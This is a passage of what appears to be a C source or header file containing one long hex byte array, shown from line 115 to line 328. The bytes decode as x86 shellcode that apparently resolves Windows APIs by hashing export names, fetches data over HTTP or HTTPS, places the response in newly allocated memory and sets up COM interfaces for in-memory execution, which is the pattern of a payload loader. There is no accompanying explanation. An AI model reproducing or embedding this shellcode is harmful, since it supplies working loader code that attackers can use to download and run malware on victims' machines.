115 | 0x2b, 0xfb, 0x78, 0x3b, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a, 0x40, 0x57, | |
116 | 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x57, 0xe8, 0x7e, 0x15, | |
117 | 0x00, 0x00, 0x81, 0xeb, 0xe4, 0x2a, 0x40, 0x00, 0x03, 0xc3, 0x50, 0x55, | |
118 | 0xe8, 0x0c, 0x18, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10, | |
119 | 0x50, 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x33, 0xc0, | |
120 | 0x40, 0xeb, 0x02, 0x33, 0xc0, 0x5f, 0x5d, 0x5e, 0x5b, 0x59, 0xc3, 0x51, | |
121 | 0x53, 0x56, 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x86, 0x4c, 0x03, 0x00, 0x00, | |
122 | 0x50, 0xff, 0x56, 0x30, 0x8b, 0xd8, 0x85, 0xdb, 0x75, 0x06, 0x40, 0xe9, | |
123 | 0xc5, 0x00, 0x00, 0x00, 0x55, 0x57, 0x8d, 0x86, 0x5c, 0x03, 0x00, 0x00, | |
124 | 0x50, 0x53, 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0xaa, | |
125 | 0x00, 0x00, 0x00, 0xbf, 0xda, 0x2a, 0x40, 0x00, 0x81, 0xef, 0x0e, 0x14, | |
126 | 0x40, 0x00, 0x0f, 0x88, 0x99, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x18, | |
127 | 0x50, 0x6a, 0x40, 0x57, 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x0f, 0x84, | |
128 | 0x85, 0x00, 0x00, 0x00, 0x57, 0xe8, 0xf2, 0x14, 0x00, 0x00, 0xb9, 0x0e, | |
129 | 0x14, 0x40, 0x00, 0x81, 0xe9, 0xe4, 0x2a, 0x40, 0x00, 0x03, 0xc1, 0x50, | |
130 | 0x55, 0xe8, 0x7b, 0x17, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, | |
131 | 0x10, 0x50, 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x8d, | |
132 | 0x86, 0x7c, 0x03, 0x00, 0x00, 0x50, 0x53, 0xff, 0x56, 0x34, 0x8b, 0xe8, | |
133 | 0x85, 0xed, 0x74, 0x49, 0xbf, 0xd1, 0x2a, 0x40, 0x00, 0xbb, 0xc2, 0x2a, | |
134 | 0x40, 0x00, 0x2b, 0xfb, 0x78, 0x3b, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a, | |
135 | 0x40, 0x57, 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x57, 0xe8, | |
136 | 0x98, 0x14, 0x00, 0x00, 0x81, 0xeb, 0xe4, 0x2a, 0x40, 0x00, 0x03, 0xc3, | |
137 | 0x50, 0x55, 0xe8, 0x26, 0x17, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, | |
138 | 0x24, 0x10, 0x50, 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, | |
139 | 0x33, 0xc0, 0x40, 0xeb, 0x02, 0x33, 0xc0, 0x5f, 0x5d, 0x5e, 0x5b, 0x59, | |
140 | 0xc3, 0x81, 0xec, 0x58, 0x02, 0x00, 0x00, 0x53, 0x56, 0x57, 0x6a, 0x3c, | |
141 | 0x5f, 0x33, 0xf6, 0x8d, 0x44, 0x24, 0x28, 0x57, 0x56, 0x50, 0x89, 0x74, | |
142 | 0x24, 0x20, 0xbb, 0x00, 0x02, 0x60, 0x84, 0xe8, 0x09, 0x17, 0x00, 0x00, | |
143 | 0x8d, 0x44, 0x24, 0x70, 0x89, 0x7c, 0x24, 0x34, 0x8b, 0xbc, 0x24, 0x74, | |
144 | 0x02, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x89, 0x44, 0x24, 0x38, 0x8d, 0x84, | |
145 | 0x24, 0x64, 0x01, 0x00, 0x00, 0x89, 0x44, 0x24, 0x54, 0xb8, 0x00, 0x01, | |
146 | 0x00, 0x00, 0x89, 0x44, 0x24, 0x3c, 0x89, 0x44, 0x24, 0x58, 0x8d, 0x44, | |
147 | 0x24, 0x28, 0x50, 0x68, 0x00, 0x00, 0x00, 0x10, 0x56, 0x8d, 0x87, 0x10, | |
148 | 0x05, 0x00, 0x00, 0x50, 0xff, 0x57, 0x7c, 0x85, 0xc0, 0x0f, 0x84, 0xb4, | |
149 | 0x01, 0x00, 0x00, 0x33, 0xc0, 0x83, 0x7c, 0x24, 0x34, 0x04, 0x56, 0x56, | |
150 | 0x0f, 0x94, 0xc0, 0x56, 0x89, 0x44, 0x24, 0x1c, 0xb8, 0x00, 0x32, 0xe0, | |
151 | 0x84, 0x56, 0x56, 0x0f, 0x44, 0xd8, 0xff, 0x97, 0x80, 0x00, 0x00, 0x00, | |
152 | 0x8b, 0xc8, 0x89, 0x4c, 0x24, 0x24, 0x85, 0xc9, 0x0f, 0x84, 0x85, 0x01, | |
153 | 0x00, 0x00, 0x39, 0x74, 0x24, 0x10, 0xba, 0xbb, 0x01, 0x00, 0x00, 0x56, | |
154 | 0x56, 0x6a, 0x03, 0x56, 0x56, 0x6a, 0x50, 0x58, 0x0f, 0x45, 0xc2, 0x0f, | |
155 | 0xb7, 0xc0, 0x50, 0x8d, 0x44, 0x24, 0x7c, 0x50, 0x51, 0xff, 0x97, 0x84, | |
156 | 0x00, 0x00, 0x00, 0x8b, 0xc8, 0x89, 0x4c, 0x24, 0x20, 0x85, 0xc9, 0x0f, | |
157 | 0x84, 0xfb, 0x00, 0x00, 0x00, 0x55, 0x56, 0x53, 0x56, 0x56, 0x56, 0x8d, | |
158 | 0x84, 0x24, 0x7c, 0x01, 0x00, 0x00, 0x50, 0x8d, 0x87, 0x10, 0x06, 0x00, | |
159 | 0x00, 0x50, 0x51, 0xff, 0x97, 0x94, 0x00, 0x00, 0x00, 0x8b, 0xe8, 0x85, | |
160 | 0xed, 0x0f, 0x84, 0xca, 0x00, 0x00, 0x00, 0x39, 0x74, 0x24, 0x14, 0x74, | |
161 | 0x20, 0xf7, 0xc3, 0x00, 0x10, 0x00, 0x00, 0x74, 0x18, 0x6a, 0x04, 0x8d, | |
162 | 0x44, 0x24, 0x20, 0xc7, 0x44, 0x24, 0x20, 0x80, 0x33, 0x00, 0x00, 0x50, | |
163 | 0x6a, 0x1f, 0x55, 0xff, 0x97, 0x88, 0x00, 0x00, 0x00, 0x56, 0x56, 0x56, | |
164 | 0x56, 0x55, 0xff, 0x97, 0x98, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, | |
165 | 0x8a, 0x00, 0x00, 0x00, 0x56, 0x8d, 0x44, 0x24, 0x14, 0xc7, 0x44, 0x24, | |
166 | 0x14, 0x04, 0x00, 0x00, 0x00, 0x50, 0x8d, 0x44, 0x24, 0x20, 0x50, 0x68, | |
167 | 0x13, 0x00, 0x00, 0x20, 0x55, 0xff, 0x97, 0x9c, 0x00, 0x00, 0x00, 0x85, | |
168 | 0xc0, 0x74, 0x67, 0x81, 0x7c, 0x24, 0x18, 0xc8, 0x00, 0x00, 0x00, 0x75, | |
169 | 0x5d, 0x56, 0x8d, 0x44, 0x24, 0x14, 0xc7, 0x44, 0x24, 0x14, 0x04, 0x00, | |
170 | 0x00, 0x00, 0x50, 0x8d, 0x9f, 0x40, 0x07, 0x00, 0x00, 0x53, 0x68, 0x05, | |
171 | 0x00, 0x00, 0x20, 0x55, 0x89, 0x33, 0x89, 0x73, 0x04, 0xff, 0x97, 0x9c, | |
172 | 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x33, 0x8b, 0x03, 0x0b, 0x43, 0x04, | |
173 | 0x74, 0x2c, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0xff, 0x33, 0x56, | |
174 | 0xff, 0x57, 0x3c, 0x89, 0x87, 0x48, 0x07, 0x00, 0x00, 0x85, 0xc0, 0x74, | |
175 | 0x15, 0x8d, 0x4c, 0x24, 0x20, 0x89, 0x74, 0x24, 0x20, 0x51, 0xff, 0x33, | |
176 | 0x50, 0x55, 0xff, 0x97, 0x8c, 0x00, 0x00, 0x00, 0x8b, 0xf0, 0x55, 0xff, | |
177 | 0x97, 0x90, 0x00, 0x00, 0x00, 0xff, 0x74, 0x24, 0x24, 0xff, 0x97, 0x90, | |
178 | 0x00, 0x00, 0x00, 0x5d, 0xff, 0x74, 0x24, 0x24, 0xff, 0x97, 0x90, 0x00, | |
179 | 0x00, 0x00, 0x85, 0xf6, 0x74, 0x45, 0xff, 0xb7, 0x40, 0x07, 0x00, 0x00, | |
180 | 0x8b, 0x9f, 0x48, 0x07, 0x00, 0x00, 0x8d, 0x87, 0x30, 0x07, 0x00, 0x00, | |
181 | 0x53, 0x50, 0x8d, 0x87, 0x20, 0x07, 0x00, 0x00, 0x50, 0xe8, 0x0e, 0x14, | |
182 | 0x00, 0x00, 0xff, 0x77, 0x2c, 0x8d, 0x87, 0x18, 0x06, 0x00, 0x00, 0xff, | |
183 | 0x77, 0x28, 0x50, 0xe8, 0xd7, 0x12, 0x00, 0x00, 0x83, 0xc4, 0x1c, 0x3b, | |
184 | 0x83, 0x08, 0x19, 0x00, 0x00, 0x75, 0x0c, 0x3b, 0x93, 0x0c, 0x19, 0x00, | |
185 | 0x00, 0x75, 0x04, 0x8b, 0xc6, 0xeb, 0x02, 0x33, 0xc0, 0x5f, 0x5e, 0x5b, | |
186 | 0x81, 0xc4, 0x58, 0x02, 0x00, 0x00, 0xc3, 0x81, 0xec, 0xdc, 0x01, 0x00, | |
187 | 0x00, 0x53, 0x55, 0x56, 0x8b, 0xb4, 0x24, 0xf0, 0x01, 0x00, 0x00, 0x57, | |
188 | 0x8b, 0x6e, 0x3c, 0x8b, 0x44, 0x2e, 0x78, 0x85, 0xc0, 0x0f, 0x84, 0xe5, | |
189 | 0x00, 0x00, 0x00, 0x8d, 0x3c, 0x30, 0x8b, 0x5f, 0x18, 0x85, 0xdb, 0x0f, | |
190 | 0x84, 0xd7, 0x00, 0x00, 0x00, 0x8b, 0x47, 0x1c, 0x33, 0xd2, 0x03, 0xc6, | |
191 | 0x89, 0x54, 0x24, 0x10, 0x89, 0x44, 0x24, 0x24, 0x8b, 0x47, 0x20, 0x03, | |
192 | 0xc6, 0x89, 0x44, 0x24, 0x14, 0x8b, 0x47, 0x24, 0x03, 0xc6, 0x89, 0x44, | |
193 | 0x24, 0x20, 0x8b, 0x47, 0x0c, 0x03, 0xc6, 0x8a, 0x08, 0x84, 0xc9, 0x74, | |
194 | 0x2a, 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x94, 0x24, 0xe8, 0x00, 0x00, 0x00, | |
195 | 0x2b, 0xd0, 0x80, 0xc9, 0x20, 0x46, 0x88, 0x0c, 0x02, 0x40, 0x8a, 0x08, | |
196 | 0x84, 0xc9, 0x75, 0xf2, 0x89, 0x74, 0x24, 0x10, 0x8b, 0xb4, 0x24, 0xf4, | |
197 | 0x01, 0x00, 0x00, 0x8b, 0x54, 0x24, 0x10, 0xff, 0xb4, 0x24, 0x04, 0x02, | |
198 | 0x00, 0x00, 0x8d, 0x84, 0x24, 0xec, 0x00, 0x00, 0x00, 0xc6, 0x84, 0x14, | |
199 | 0xec, 0x00, 0x00, 0x00, 0x00, 0xff, 0xb4, 0x24, 0x04, 0x02, 0x00, 0x00, | |
200 | 0x50, 0xe8, 0x0d, 0x12, 0x00, 0x00, 0x89, 0x44, 0x24, 0x24, 0x83, 0xc4, | |
201 | 0x0c, 0x8b, 0x44, 0x24, 0x14, 0x83, 0xc0, 0xfc, 0x89, 0x54, 0x24, 0x1c, | |
202 | 0x8d, 0x04, 0x98, 0x89, 0x44, 0x24, 0x10, 0xff, 0xb4, 0x24, 0x04, 0x02, | |
203 | 0x00, 0x00, 0x8b, 0x08, 0xff, 0xb4, 0x24, 0x04, 0x02, 0x00, 0x00, 0x03, | |
204 | 0xce, 0x51, 0xe8, 0xdc, 0x11, 0x00, 0x00, 0x33, 0x44, 0x24, 0x24, 0x83, | |
205 | 0xc4, 0x0c, 0x33, 0x54, 0x24, 0x1c, 0x3b, 0x84, 0x24, 0xf8, 0x01, 0x00, | |
206 | 0x00, 0x75, 0x09, 0x3b, 0x94, 0x24, 0xfc, 0x01, 0x00, 0x00, 0x74, 0x1d, | |
207 | 0x8b, 0x44, 0x24, 0x10, 0x83, 0xe8, 0x04, 0x89, 0x44, 0x24, 0x10, 0x83, | |
208 | 0xeb, 0x01, 0x75, 0xbb, 0x33, 0xc0, 0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, | |
209 | 0xdc, 0x01, 0x00, 0x00, 0xc3, 0x8b, 0x44, 0x24, 0x20, 0x8b, 0x4c, 0x24, | |
210 | 0x24, 0x0f, 0xb7, 0x44, 0x58, 0xfe, 0x8b, 0x0c, 0x81, 0x03, 0xce, 0x3b, | |
211 | 0xcf, 0x72, 0x7d, 0x8b, 0x44, 0x2e, 0x7c, 0x03, 0xc7, 0x3b, 0xc8, 0x73, | |
212 | 0x73, 0x33, 0xd2, 0x38, 0x11, 0x74, 0x1e, 0x8d, 0x7c, 0x24, 0x28, 0x8b, | |
213 | 0xf1, 0x2b, 0xf9, 0x83, 0xfa, 0x3c, 0x73, 0x11, 0x8a, 0x06, 0x88, 0x04, | |
214 | 0x37, 0x80, 0x3e, 0x2e, 0x74, 0x07, 0x42, 0x46, 0x80, 0x3e, 0x00, 0x75, | |
215 | 0xea, 0xc7, 0x44, 0x14, 0x29, 0x64, 0x6c, 0x6c, 0x00, 0x42, 0x03, 0xca, | |
216 | 0x33, 0xd2, 0x38, 0x11, 0x74, 0x17, 0x8d, 0x74, 0x24, 0x68, 0x2b, 0xf1, | |
217 | 0x83, 0xfa, 0x7f, 0x73, 0x0c, 0x8a, 0x01, 0x42, 0x88, 0x04, 0x0e, 0x41, | |
218 | 0x80, 0x39, 0x00, 0x75, 0xef, 0x8b, 0xb4, 0x24, 0xf0, 0x01, 0x00, 0x00, | |
219 | 0x8d, 0x44, 0x24, 0x28, 0x50, 0xc6, 0x44, 0x14, 0x6c, 0x00, 0xff, 0x56, | |
220 | 0x30, 0x85, 0xc0, 0x74, 0x0d, 0x8d, 0x4c, 0x24, 0x68, 0x51, 0x50, 0xff, | |
221 | 0x56, 0x34, 0x8b, 0xc8, 0xeb, 0x02, 0x33, 0xc9, 0x8b, 0xc1, 0xe9, 0x5b, | |
222 | 0xff, 0xff, 0xff, 0x56, 0x8b, 0x74, 0x24, 0x0c, 0x57, 0x33, 0xff, 0x8b, | |
223 | 0x4e, 0x18, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08, | |
224 | 0x89, 0x7e, 0x18, 0x8b, 0x4e, 0x1c, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01, | |
225 | 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x1c, 0x8b, 0x4e, 0x14, 0x85, 0xc9, | |
226 | 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x14, 0x8b, | |
227 | 0x4e, 0x10, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08, | |
228 | 0x89, 0x7e, 0x10, 0x8b, 0x4e, 0x0c, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01, | |
229 | 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x0c, 0x8b, 0x4e, 0x08, 0x85, 0xc9, | |
230 | 0x74, 0x12, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x2c, 0x8b, 0x46, 0x08, 0x50, | |
231 | 0x8b, 0x08, 0xff, 0x51, 0x08, 0x89, 0x7e, 0x08, 0x8b, 0x4e, 0x04, 0x85, | |
232 | 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x04, | |
233 | 0x8b, 0x0e, 0x85, 0xc9, 0x74, 0x08, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08, | |
234 | 0x89, 0x3e, 0x5f, 0x5e, 0xc3, 0x8b, 0x44, 0x24, 0x04, 0x83, 0xc0, 0x10, | |
235 | 0xf0, 0xff, 0x00, 0x8b, 0x00, 0xc2, 0x04, 0x00, 0xb8, 0x01, 0x40, 0x00, | |
236 | 0x80, 0xc2, 0x0c, 0x00, 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc2, 0x10, 0x00, | |
237 | 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc2, 0x08, 0x00, 0x8b, 0x44, 0x24, 0x04, | |
238 | 0xff, 0x74, 0x24, 0x18, 0xff, 0x74, 0x24, 0x14, 0x8b, 0x40, 0x08, 0xff, | |
239 | 0x74, 0x24, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0xc2, 0x18, 0x00, | |
240 | 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc2, 0x14, 0x00, 0x57, 0x8b, 0x7c, 0x24, | |
241 | 0x14, 0x85, 0xff, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x16, | |
242 | 0x56, 0x8b, 0x74, 0x24, 0x0c, 0x8b, 0x46, 0x08, 0x50, 0x8b, 0x08, 0xff, | |
243 | 0x51, 0x04, 0x8b, 0x46, 0x08, 0x89, 0x07, 0x33, 0xc0, 0x5e, 0x5f, 0xc2, | |
244 | 0x10, 0x00, 0x8b, 0x44, 0x24, 0x08, 0x85, 0xc0, 0x75, 0x07, 0xb8, 0x03, | |
245 | 0x40, 0x00, 0x80, 0xeb, 0x08, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00, 0x33, | |
246 | 0xc0, 0xc2, 0x08, 0x00, 0x55, 0x8b, 0xec, 0xff, 0x75, 0x28, 0x8b, 0x45, | |
247 | 0x08, 0xff, 0x75, 0x24, 0xff, 0x75, 0x20, 0x8b, 0x48, 0x08, 0xff, 0x75, | |
248 | 0x1c, 0xff, 0x75, 0x18, 0x8b, 0x11, 0xff, 0x75, 0x0c, 0x50, 0x51, 0xff, | |
249 | 0x52, 0x2c, 0x5d, 0xc2, 0x24, 0x00, 0x53, 0x56, 0x57, 0xe8, 0x42, 0x0f, | |
250 | 0x00, 0x00, 0x8b, 0x74, 0x24, 0x14, 0xb9, 0x13, 0x1e, 0x40, 0x00, 0xbf, | |
251 | 0xe4, 0x2a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x08, | |
252 | 0xe8, 0x27, 0x0f, 0x00, 0x00, 0xb9, 0xe5, 0x1a, 0x40, 0x00, 0x2b, 0xcf, | |
253 | 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x04, 0xe8, 0x14, 0x0f, 0x00, 0x00, | |
254 | 0xb9, 0x9c, 0x1e, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, | |
255 | 0x48, 0x08, 0xe8, 0x01, 0x0f, 0x00, 0x00, 0xb9, 0x5a, 0x1b, 0x40, 0x00, | |
256 | 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x0c, 0xe8, 0xee, 0x0e, | |
257 | 0x00, 0x00, 0xb9, 0x30, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, | |
258 | 0x06, 0x89, 0x48, 0x10, 0xe8, 0xdb, 0x0e, 0x00, 0x00, 0xb9, 0x0c, 0x1b, | |
259 | 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x14, 0xe8, | |
260 | 0xc8, 0x0e, 0x00, 0x00, 0xb9, 0x74, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, | |
261 | 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x18, 0xe8, 0xb5, 0x0e, 0x00, 0x00, 0xb9, | |
262 | 0x71, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, | |
263 | 0x1c, 0xe8, 0xa2, 0x0e, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, | |
264 | 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x20, 0xe8, 0x8f, 0x0e, 0x00, | |
265 | 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, | |
266 | 0x89, 0x48, 0x24, 0xe8, 0x7c, 0x0e, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, | |
267 | 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x28, 0xe8, 0x69, | |
268 | 0x0e, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, | |
269 | 0x8b, 0x06, 0x89, 0x48, 0x2c, 0xe8, 0x56, 0x0e, 0x00, 0x00, 0xb9, 0x04, | |
270 | 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x30, | |
271 | 0xe8, 0x43, 0x0e, 0x00, 0x00, 0xb9, 0x84, 0x1e, 0x40, 0x00, 0x2b, 0xcf, | |
272 | 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x34, 0xe8, 0x30, 0x0e, 0x00, 0x00, | |
273 | 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, | |
274 | 0x48, 0x38, 0xe8, 0x1d, 0x0e, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, | |
275 | 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x3c, 0xe8, 0x0a, 0x0e, | |
276 | 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, | |
277 | 0x06, 0x89, 0x48, 0x40, 0xe8, 0xf7, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, | |
278 | 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x44, 0xe8, | |
279 | 0xe4, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, | |
280 | 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x48, 0xe8, 0xd1, 0x0d, 0x00, 0x00, 0xb9, | |
281 | 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, | |
282 | 0x4c, 0xe8, 0xbe, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, | |
283 | 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x50, 0xe8, 0xab, 0x0d, 0x00, | |
284 | 0x00, 0xb9, 0xfc, 0x1a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, | |
285 | 0x89, 0x48, 0x54, 0xe8, 0x98, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, | |
286 | 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x58, 0xe8, 0x85, | |
287 | 0x0d, 0x00, 0x00, 0xb9, 0x28, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, | |
288 | 0x8b, 0x06, 0x89, 0x48, 0x5c, 0xe8, 0x72, 0x0d, 0x00, 0x00, 0xb9, 0x04, | |
289 | 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x60, | |
290 | 0xe8, 0x5f, 0x0d, 0x00, 0x00, 0xb9, 0xac, 0x1e, 0x40, 0x00, 0x2b, 0xcf, | |
291 | 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x64, 0xe8, 0x4c, 0x0d, 0x00, 0x00, | |
292 | 0xb9, 0xf4, 0x1a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, | |
293 | 0x48, 0x68, 0xe8, 0x39, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, | |
294 | 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x6c, 0xe8, 0x26, 0x0d, | |
295 | 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, | |
296 | 0x06, 0x89, 0x48, 0x70, 0xe8, 0x13, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, | |
297 | 0x40, 0x00, 0x8d, 0x5e, 0x04, 0x2b, 0xcf, 0x8b, 0x7c, 0x24, 0x10, 0x03, | |
298 | 0xc8, 0x8b, 0x06, 0x53, 0x89, 0x48, 0x74, 0x8d, 0x87, 0xdc, 0x03, 0x00, | |
299 | 0x00, 0x83, 0x66, 0x10, 0x00, 0x50, 0x89, 0x7e, 0x14, 0xff, 0x57, 0x78, | |
300 | 0x85, 0xc0, 0x75, 0x13, 0x8b, 0x0b, 0x8d, 0x46, 0x08, 0x50, 0x8d, 0x87, | |
301 | 0x8c, 0x04, 0x00, 0x00, 0x50, 0x8b, 0x11, 0x51, 0xff, 0x52, 0x18, 0x5f, | |
302 | 0x5e, 0x5b, 0xc3, 0x8b, 0x54, 0x24, 0x0c, 0x85, 0xd2, 0x75, 0x07, 0xb8, | |
303 | 0x03, 0x40, 0x00, 0x80, 0xeb, 0x5f, 0x53, 0x8b, 0x5c, 0x24, 0x0c, 0x33, | |
304 | 0xc9, 0x56, 0x8b, 0x74, 0x24, 0x0c, 0x57, 0x8b, 0x7e, 0x14, 0x8b, 0x84, | |
305 | 0x8f, 0xfc, 0x03, 0x00, 0x00, 0x3b, 0x04, 0x8b, 0x75, 0x08, 0x41, 0x83, | |
306 | 0xf9, 0x04, 0x75, 0xee, 0xeb, 0x2a, 0x33, 0xc9, 0x8b, 0x84, 0x8f, 0x0c, | |
307 | 0x04, 0x00, 0x00, 0x3b, 0x04, 0x8b, 0x75, 0x08, 0x41, 0x83, 0xf9, 0x04, | |
308 | 0x75, 0xee, 0xeb, 0x14, 0x33, 0xc9, 0x8b, 0x84, 0x8f, 0x8c, 0x04, 0x00, | |
309 | 0x00, 0x3b, 0x04, 0x8b, 0x75, 0x0c, 0x41, 0x83, 0xf9, 0x04, 0x75, 0xee, | |
310 | 0x89, 0x32, 0x33, 0xc0, 0xeb, 0x08, 0x83, 0x22, 0x00, 0xb8, 0x02, 0x40, | |
311 | 0x00, 0x80, 0x5f, 0x5e, 0x5b, 0xc2, 0x0c, 0x00, 0x8b, 0x44, 0x24, 0x04, | |
312 | 0x6a, 0x00, 0x6a, 0x00, 0x6a, 0xfd, 0x8b, 0x40, 0x0c, 0x50, 0x8b, 0x08, | |
313 | 0xff, 0x51, 0x38, 0x33, 0xc0, 0xc2, 0x08, 0x00, 0x8b, 0x4c, 0x24, 0x04, | |
314 | 0x83, 0xc8, 0xff, 0xf0, 0x0f, 0xc1, 0x41, 0x10, 0x48, 0xc2, 0x04, 0x00, | |
315 | 0x8b, 0x44, 0x24, 0x04, 0xff, 0x74, 0x24, 0x08, 0x8b, 0x40, 0x14, 0xff, | |
316 | 0x50, 0x4c, 0x33, 0xc0, 0xc2, 0x08, 0x00, 0x83, 0xec, 0x14, 0x53, 0x8b, | |
317 | 0x5c, 0x24, 0x1c, 0x55, 0x56, 0x57, 0x33, 0xff, 0x8d, 0xab, 0x48, 0x07, | |
318 | 0x00, 0x00, 0x83, 0xbb, 0x0c, 0x05, 0x00, 0x00, 0x01, 0x8b, 0xc7, 0x89, | |
319 | 0x7c, 0x24, 0x10, 0x74, 0x03, 0x8b, 0x6d, 0x00, 0x8b, 0x8b, 0xa4, 0x00, | |
320 | 0x00, 0x00, 0x8b, 0x74, 0x24, 0x2c, 0x85, 0xc9, 0x0f, 0x84, 0xc5, 0x01, | |
321 | 0x00, 0x00, 0x56, 0x8d, 0x83, 0x2c, 0x04, 0x00, 0x00, 0x50, 0x8d, 0x83, | |
322 | 0x1c, 0x04, 0x00, 0x00, 0x50, 0xff, 0xd1, 0x85, 0xc0, 0x0f, 0x88, 0x89, | |
323 | 0x01, 0x00, 0x00, 0x8b, 0x16, 0x8d, 0x7e, 0x04, 0x57, 0x8d, 0x83, 0x3c, | |
324 | 0x04, 0x00, 0x00, 0x50, 0x8b, 0x0a, 0x8d, 0x45, 0x04, 0x50, 0x52, 0xff, | |
325 | 0x51, 0x0c, 0x85, 0xc0, 0x0f, 0x88, 0x62, 0x01, 0x00, 0x00, 0x8b, 0x07, | |
326 | 0x8d, 0x54, 0x24, 0x14, 0x52, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0x85, | |
327 | 0xc0, 0x0f, 0x88, 0x5c, 0x01, 0x00, 0x00, 0x83, 0x7c, 0x24, 0x14, 0x00, | |
328 | 0x74, 0x1a, 0x8b, 0x0f, 0x8d, 0x46, 0x08, 0x50, 0x8d, 0x83, 0x5c, 0x04, | |
